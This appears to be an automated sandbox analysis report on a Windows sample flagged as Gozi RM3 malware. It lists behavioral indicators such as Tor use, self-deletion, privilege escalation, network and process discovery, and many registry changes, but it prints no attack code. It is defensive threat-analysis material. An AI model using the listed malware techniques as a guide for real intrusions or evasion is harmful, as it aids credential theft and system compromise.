Analysis Overview
SHA256
0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f
Threat Level: Known bad
The file Restr.com was found to be: Known bad.
Malicious Activity Summary
Gozi RM3
Grants admin privileges
Deletes itself
Uses Tor communications
Drops file in System32 directory
Program crash
Modifies Internet Explorer settings
Delays execution with timeout.exe
Enumerates processes with tasklist
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Runs net.exe
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Discovers systems in the same network
Gathers system information
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-15 08:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-15 08:05
Reported
2022-03-15 08:35
Platform
win7-20220310-en
Max time kernel
813s
Max time network
1783s
Command Line
Signatures
Gozi RM3
Grants admin privileges
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Uses Tor communications
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e50000000002000000000010660000000100002000000013e729f8d0199c8b3388f72cba6981afef89518eab826b0acbcf49f9412abd3d000000000e8000000002000020000000b8b519f84316240c3aa3b4dbdb48ded4d09ff3d39ed2f5e88d399a57d9c15e1b30010000d75e904ae2708e45fd91cf35d49ea228fd21d8b16add4ec2139710fe65e7a8513a70dd76dbb9fd2a8ec199fab6c01f699579625d422ca909d49a8129b10a76b96dbeacd1b78c70e1d5032b3c382754b5a39f26dd3646e486dd07daa049d655bce728f947bd1bf2854b273bf232be84981d8c84ee8cccc37b3566fb93a2230bf33a837c052f89f259d0714e48c113f796fa8987324b35331aa1a5740b87b47f2a692f6adb68022c3d6e289ee06702749224aa42b9ad39c69775648f1d86a08cb445643eb3f576af34663ff22fb6d911638b8cf929a7e45270bc8dad889660926f449a4addf2bf25453d6b096e42a098ca13ceaf97ec544394f504f5a27a5cfce2623e2f7ac77c8e83fca142fe0b34cd437d127786e3aa824be37b5ad2384f55b530aefbe6ad6ce60d651a05b3338ea7ac40000000ce48cca7560ca41ddb53aef8cd19865c17ff282f491c1ea61d1a6027f0ac9c6442ee5a30e8aee47f269fb288c78cadb9a62eeb8642fa0fc8b921eebd007219b1 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000001253851e9c72fbbe26a60558a052caefc4be7f0b92c10d76852aa1a667d30ade000000000e80000000020000200000009f5faac493dd9e81ae8424f27edb184bf46ffd484adefe22c7ca1a5289f255ce300100006ebf813f74442d1aa7235a6d1c89baec15b851ede5e64ca295567c2d94d341b782bfc9c57b7542108f13ef522e0b1864116cd6908789d15893d8422b13a586603c02114a5652059d7ddabceebea2971e03dcce8c4c0215680c37afe7bfc1b9a21efcdd9581859a1f198d9ddb3567a88b3f78ebad11cee2a648d564edbc40849621c0e36f683ad4d11309e55e2903807e5bbcdb8293737f9df35b6a334902ab35ea0cd297f0bec821da5130ba4d92f9e45e0ee5d67744fe0aa2f7e2be61323cf02023978bd858bcfe7b4e7751cf191cdbe3b2140b3814de7b4a8712e55478f569b108913ce2410348b8f1528c04248ab2331ef22d4e2f36e7da2babcd03bf799f9249c6a03980e46bd3dc2286d75305d017c266050da68668d97b013e9820d084da11d4a6e0c6654eaa1efaa3484a6b16400000001d9618d6d327e40799885ed9fba9f6bc2c5009edb5b36980b9c87e5b6ee241f32346911de923bb0cfd039488233a4627e6f43c4f5f617d7b12649b70c532e07c | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000000d1b8db92c8f7900356eaa87fa6ce42aa247aa119a4e55e3b00db422410a6442000000000e8000000002000020000000234346cc27fd74d2f996a365f28c9b36e7511d00a483c44a2187f6bc7adc54dc3001000053318a171a143268d2da4fbe28b0460a6d7977fd287c80334f275fc07a80b081da06f44ae4c360dbb00fd5ac771bd243195a63efdb96a654eabc854b77733c8ffcdf896e763138b4ebc220db1859e521f5817df34d6730dbd6b05825e841f861390c10d5e75c6380edc1b80db2ccbc200085a5ae0298bf5b4a0b9f746df7c6e7625553c4a74fb3cd9235bd47e3830abce883cca1a623628fb9c28efa7cd884300a3d35ba3e84be706c93f1bddd58a94b4c300e5650325b9a4c45f9fd35e960f40246c0c0d86bea56a1252eacf59a541695103270caa26a5d594d613eda940d9ea9d1c31259df9e37fb3d9f5500be7ffeedd0c10f077ef9d31e67d3bac7aa18e1e1b9af2e218965f78587cf8d89bf7fb84f4a567bc992182d5844e2a2ac4957b8a3d68704038a81ecd6d3c0835b8643c5400000006c6dd99d64a76f589eec6088af9785e884210325a2c0acb6c91560e6c46a192274a5ae86b91e7ab7148fb10beeda53a4d19c0de42efb087c04444bf5e5d41d21 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000002c99b8e9ab77a25760a4b815ae5181bffde539ff42718f672b1b9f331e2df6d5000000000e8000000002000020000000e4aba0743beb4cf6e0fb7a36e06b785ce584fa692571faec8a0be10ec1ee1ed030010000009b85ed8ecf0a9d15e320e68b8f1494dd30f3a37d160fa4326a44084e328eed3761b12d2471bbd750c1aa8c657c9b81daa0077d131bccacd3e54f03b460f85b018a3d55b04ebd9ab56be7a5835b4cdd25a408bed35e063ff058a62f3c2c3d0790ce39bc868692c2147a59cc979e69609371d639aa8af3ea0f310ae4f6d1fdd2d7bf6cc30e3375f170df9ff974a5e903418ce37ac83b0399f6fb54f7542c52966eec68369aa9653f1ce8ab3d0e172a26b1296dd22052c2fe4be27c77b3e11a5b21e03dbeaa417f9436e2561e9e3cc3029a2f062e7b90dfc3a21c3fda116b53f6ee83e46faee03f379fa1bfb8b7ca2c2deea57b9c7d47d5e97c46725c7e08b880e98a7ad15683e27bcc3b03424be2c7f3b934661025fcbd236c7e28c9cc195666678b10ea01d7688be411ea70c8eee7f240000000c6236490c2ea1fde269e600d15cdf6b81b307722a6a9cc7e6d066af18092335789613ec9681a21b2a93905457821ff886211b4a0c5e80f8aa40e2f42725d2fbd | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000beeec9d2deb8f069bada8067d9001c993578286c6e26a40b2caf081991ec7f13000000000e80000000020000200000009f513064928681f4d307c5083b82ad1b6fd4cb4dae08c23c66e129f8cb6545363001000012213090d33a3624b003cb3b1067553475d4fa62a29601edf3b66f2a16fa331e4d73e080dbd9a0c27c25c1d8318f26f88b269b651e53f901d3003ba3f92d990907440912b2ef3337f744055e5ac283ed16e1f8b470cbf04908eefc3894b4a93a260c825d704b56d9320b784c178930c760157e580fbeee88c993c502c40f0adf265fb99bce6ce16749e095bf31ffe12fc6f80afd71890f12c0a1a4b1e589589a6e038efbdd073a2ea82fc8ece2fe6abe5c1fd4382800f9b654edd0e0209c56f960f7f558c1b8dc44f50015bad9770730da9ff78cb50a32c4d5974703636dcd919106e7c0a35a734786d9c67f82fc990b7feebb12e00395cfa3e2e081f85f52cb4cd665a4b39937e2fe6eff82d26e5d9c56068e504358c0bcb54cbdab30bae07b0e561bbf2aadcfe5c0d792c8c9488f3540000000ea5e272b49bbae76942382a26b7dc43e6e462f85ab391c376e783bd31f16d1bdda26c2ab53f1cb161d077d40555989c681a040d71a8bfd74103d0fbf47b757f9 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000005e39a2f2120417b65ac9106ceed3a24fc0d408ea270bf396be320bddbc398919000000000e80000000020000200000004398fd14b62f40f6ef9fb89b20ab961e0ca3922faaeb2ea7597cd399b1cdaef7900000006547d28725f1586abe057ca4e00523c53e52bb683cf0ca1aa72108465f5fd4f63689b64372ae46ff57644ab1a7d17111d62702b29ed3229002859d49ccc35fefc1fe45e7ea94001015683ec0b4f6cc67a98b184bd85264dbc265e461ffbf815ac35bc8fa94f01534b5fa540543a8370ec6318bd1549abca2bb9f94e3da86b3aa36bd23ee7b37ced3de2a653e13d48ac2400000001755f77689db2a92a58dd53eb4014329acf5f8577d77e89d36da655e5dd679cc4ce6e95212ac172b6962dea94730c56c3a5e69fd7e62ce06d67633fe271ac64c | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000000327417904ce8ccc1fbac4b6b9207c038487f464f9180dbab3015b4354d33bd0000000000e8000000002000020000000f424f0ea33e3bda01dc30ff48ca2ec16bd21da14d92d2112eb6074e3229f42333001000096fc8b3705b019b9a45782ce1440f77e5dea913a0ad36067ee5e6f54c812cb9018b86d3d74348203c657829d73b0ea949f1269dbe83927742645158d6bd39e8a01a2d55e7658101d8a73b2f04a4fe61a05bb838431ffdcb5af0e166143195bc6c6a9cc8e8525ed3c4f998f4a2dcfcab0196d536f9143d9d7b0ddc0cc9212ce98eade30bc49e1cd3abc488cdafeda7ead060582805db8d90beb4b43013005cb6d36ef2c6609080c969211468566beb08385758a13d7b534f21943402058b28a9ba68389b41f74e7ba82d79c460795206eec08c05337796803019c1643e9884585170ff87161753c1f446a775da5df1efc7999c277b1a81d43acf259ca4c91b02559b02a66fa60c821e23186536fecd8593589beff513995d79a282e2dfef9396e9b169a51321262184ad1a04a482907ba40000000159aaa54b4cb8adac1a981734c04efd67ac63d949f3178823b6f7b9938cd02488ffa22ad9516af632fcbd45d415be1f652921d006f18f925e741b004f3fa0b02 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000000f0c90ca8aa362f4bb280a1f912dbbfc48724fe4bb9f822285a29424f43883b6000000000e800000000200002000000019a530c4d2946803d68366d41cc65d926fde8a169bd8c6ed593681e5567185ca30010000c9374231d73f151ae93fbb1bc59d1f98100eb574af797b489ad7e8654d7ee54b2ef82bfe6a78bc228d298a0a5d61eca2f413f0e0f961d04e67495e54f29bfa8e7834ba4e1e29e31efbc784c55735ee8fb1a9f2c1557121720a3a707418f16a909cc3db2b77da90f15ee4c9ee22968c238e1ed08e2c5caf63ab002c00231ee074bc168b956bbfe29bd0052b467a47ac0cf2fb9af8a9fe7b7a861c8c308b49f6808a8e0e5d96adc8dacf7d81dd76437eb594a7c628fdd0b1e1bf27a04f36156305af876ea75b123b3619c0964da9cb408bafe87ee7d99ddc1a4ce5134ac7c2339f4feac9d8c19c640b48c888deba4220ef4646dccd99135c009012d94db1d7e4cf1f66527c2575f43c5cc865e28c3f4a52c3c837e87bb39dbafb9c83e42e9a50a0b950c7813704889c2bae7b66169302c540000000391b625ece0706cc04c52e04f62fca5c43f9c1eff0411754d7840a3821cd1e84cdb7fe2f96d6195e381db196cf562262fc96cdc03433ae7ca19360a218b7c49f | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000aba5a280f62324e21f7f014358dc7dc828ddc09c3f1209c6f292816716ad489d000000000e80000000020000200000005d3c957ae64c72dcdf974d8aab995bffa2d460e23d100038593cb637480f6aad200000002f31e5f4f1311847e5ffac143389ddbc70ba92904edbbb62588dc8a1be0d1e2840000000432722c5302fad0f3b00bc4947b6008f48fef9c7eab09ba0679698e4965ab81cb6ae14b00fefa2e9854de89198a0e65bc4d0909cd6e6f479a62a00a1419e9229 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40e6dbe04b38d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000140a62193c077483292e4f6d9df2a0177eb679dadc9e0bb37c84ac51a3f5494f000000000e80000000020000200000004f2ea5f9daa1daa926b61a42f0f53ffa1df2c1d8622ece9fc6fbf3d4e2ec322230010000b94dc60e7ebc267dc91e1362f6bcf4388c2c870af1ddd1018c86a7c822866c62081143ccf1604650ae9e404ceb4a027f25c5c48f34dc36b19bddf0882b8e8d1d49a12fa83366b8267be50ad1eba781f73f7e084bba7cd11859d16de3a49907b2378a0d696b7c3769e24184c700c649601998c53d2ccaa8cd3ff2ffcf9ade9396a9611eff189d8ad0a20116f164ff0940159c8bcbe8bc3bbd2851ed52c8b8acff7b6e44cd683d0f96e84b086d3432bea1e668c6a83946269b07afd645ac621644689f12e09d1dc35890f6843b576be7b24d1293b274a857f3e3b6f6d4f440c27f967846be2e7b88391e4f9ea0db8e636a187dfad5652475a050593facd189bfb4dd5171fed4e38925b869d16e66560f2243ad90c32edc84fb64484c84a34140409625d0e2fd6bf94545d277c49ef89fc7400000002d5a52d1000e5e2acb15a94b9cdb455034a15db0cfea7f109b91eb32a78a9f4a55abd17016ee42870400a14bddab5927f79f4f9e59d96caae0edf68bd80afe1f | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000add77028ae60a5f74186fe22959bfba532792f8ded1cda1f1a59241ff76346e1000000000e80000000020000200000009f7396147e2cd775626a8c1d6fd4ca0ea1752e716d6c72e5b6ab13e151ec4461300100001d4e4649784e956f90c6e4b37578ffde573a7e511f034748dc6e998f4bd73f52347a29eae71d93d6580ae567566e129d121034aba720fe2ea78ee30b259cf208282876e323e4ede5a7d5fb0901cfa368314c04743337bf720cbb1c2103c31dd451204c68aa59fe7c8f8dcb2ea6a59be10c8c025a38ebdb90479f92a212bd001682f47ea63fd1ce8ac830de3cdb61377371a04e97aeb4caf6a99d6e098af6c77ad89f24240c0e90ca53527c7a17a3cf04bbafe4a941fae129f9d282f78185302cca8e492efb5a66e7f2b018b8d9c2277bada8139a06c5b5f879e1a82b05620115664804cd489d129f6133c1b0384b095132a9fc3563dba565386145c144bd175303bdb3743b5fe7fb50e22ced5bccc6a616674e4875154fea273c391a3822e49be06f6f1030d9b0008de64bd28311b26c400000009001a73704a71160e44c15b19a492f8f3fe591b79a9748d3fbb08183ab5538b9da8fc7c56bff904469861f061501e81b52dda8badfb63f04f6a3da3cdabc54dd | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{17D90BF1-A43F-11EC-A594-F6E36C9641D9} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Restr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
